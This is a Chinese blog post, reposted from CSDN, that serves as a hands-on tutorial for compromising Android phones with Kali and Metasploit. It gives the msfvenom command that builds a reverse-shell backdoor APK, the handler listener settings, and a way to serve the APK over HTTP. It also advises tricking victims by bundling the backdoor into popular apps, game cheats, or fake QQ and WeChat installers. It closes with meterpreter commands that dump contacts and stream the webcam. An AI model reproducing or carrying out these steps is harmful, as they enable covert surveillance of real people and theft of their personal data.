0


实战:kali攻击Android手机

1.Metasploit及其监听模块介绍

二、手机端渗透原理

三、制作恶意软件并获取shell权限

四、实战:远程控制

msf

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。

在我们无法安装对方的网络边界的时候,往往需要我们主动出击。比如向目标手机发送一个含有后门的apk软件,或者是一个word文档,pdf文件等。想要达到效果也要利用好社会工程学,来诱骗受害者执行恶意程序。

黑客根据不同的人群进行特定的主动攻击,例如把后门捆绑到一些比较火的软件上,或者捆绑在一些网游外挂或其补丁上,然后传到网络,供他们下载。也可以伪装成QQ或者微信类的安装软件提供给有需求的人群。

msfvenom是msfpayload和msfencode的结合体,可以生成木马程序,并在目标机上执行,在本地监听上线

7a5882a7009d22c9fa25828f40641f01.png

start

生成安卓后门

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 > shell.apk

ffbf3fadcef252453d7e5ac0a2a51a96.png

使用msf中开启监听

  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost 192.168.1.10
  • set lport 4444
  • run

在kali中apk后门所在目录开启web服务:python -m SimpleHTTPServer

在安卓浏览器里访问网址下载apk

33d9ac2455d188c610949abdda88c67a.png

b5341228eca0b1fa181507a5a977154f.png

msf中会建立会话

640e756675d3221a5c58c7003036a6a0.png

执行命令
sysinfo 查看系统信息
app_list 查看安装app文件
check_root 检测系统root
dump_contacts 下载通讯录信息
webcam_list 获取摄像头信息
webcam_stream 开启摄像头

bfb6795de76ab69abeab6321f2c6fb04.png

标签: 安全 linux android

本文转载自: https://blog.csdn.net/weixin_73636162/article/details/127060991
版权归原作者 人生!? 所有, 如有侵权,请联系我们删除。

“实战:kali攻击Android手机”的评论:

还没有评论